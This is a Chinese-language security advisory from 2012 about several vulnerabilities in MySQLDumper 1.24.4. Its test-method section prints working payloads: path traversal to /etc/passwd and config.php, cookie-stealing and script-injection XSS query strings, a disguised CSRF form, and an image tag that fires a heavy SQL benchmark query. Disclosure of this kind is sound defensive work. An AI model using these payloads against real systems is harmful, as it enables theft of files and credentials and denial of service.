MySQLDumper多个安全漏洞

发布日期:2012-04-27
更新日期:2012-08-17

受影响系统:
MySQLDumper MySQLDumper 1.24.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53306

MySQLDumper是用PHP和Perl编写的MySQL数据库备份脚本。

MySQLDumper 1.24.4及其他版本在实现上存在多个安全漏洞,包括XSS、本地文件包含、跨站请求伪造、信息泄露、目录遍历漏洞,可允许攻击者获取敏感信息,执行任意脚本代码,窃取Cookie身份验证凭证,执行非法操作,查看和执行本地文件,检索任意文件。

<*来源:Akastep
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Akastep ()提供了如下测试方法:


Local File-inclusion:

?language=../../../../../../../../../../../../../../../../../etc/passwd%00


Cross-site scripting:

?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
?page=Javascript:alert%28document.cookie%29;

Cross-site request-forgery:

<img src="https://www.example.com/tld/meonyourpc.PNG" heigth="250" />
<form action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input value="Refresh" type="submit">
</form>


?language=en&phase=101
?language=en&phase=2

<img src="https://www.example.com/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" />


Directory-traversal:

?action=dl&f=../../config.php
?action=dl&f=../../../../../../../../../../../etc/passwd%00

Information disclosure



建议:
--------------------------------------------------------------------------------
厂商补丁:

MySQLDumper
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wypwyd.html